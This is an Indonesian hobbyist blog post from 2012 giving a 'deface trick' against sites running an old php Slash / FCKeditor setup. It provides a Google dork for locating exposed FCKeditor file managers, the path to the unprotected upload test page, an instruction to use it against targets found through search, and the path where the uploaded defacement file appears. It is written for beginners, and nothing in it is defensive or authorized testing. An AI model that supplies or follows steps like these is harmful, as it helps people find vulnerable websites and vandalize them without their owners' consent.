Seputar Informasi | Memberikan layanan Informasi terupdate di Era Globalisasi: Trik Deface [php Slash 0.8.1.1]

Friday, December 14, 2012

Trik Deface [php Slash 0.8.1.1] – File Upload Vulnerability [Trik Lama]

Rafi Orilya,-bagi sobat-sobat yang udah master mending close aja… ini Cuma buat yang masih belajar seperti saya. Okee.. okee.
Trik ini belum tentu masih aktif sampai sekarang, karena saya belum mencobanya lagi. Semoga sobat sukses dengan trik ini deh.. semangat ajah- hehehe…

Dork => inurl:scripts/fckeditor/editor/filemanager/
* Kembangkan sendiri

Exploit => /scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

Pasang exploit pada target yang sobat temukan di google :
http://www.target.com/[patch]/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

Terus setelah sobat sukses menguploadnya…
Sobat bisa lihat hasil deface :

http://www.target.com/[patch]/ imagenes/serverFckEditor/[file sobat]

Mengizinkan => txt, jp, dll (html dan php tidak bisa)

Yaa.. seperti itulah dokumen yang saya punya di laptop.. itu ngga tau tahun berapa tuh.
hahaha… :D

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
Hak Cipta Dilindungi

Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

Seputar Informasi | Memberikan layanan Informasi terupdate di Era Globalisasi

Friday, December 14, 2012

Trik Deface [php Slash 0.8.1.1] – File Upload Vulnerability [Trik Lama]

No comments:

Post a Comment

TopMenu

Follow us on Facebook :P

Blogger news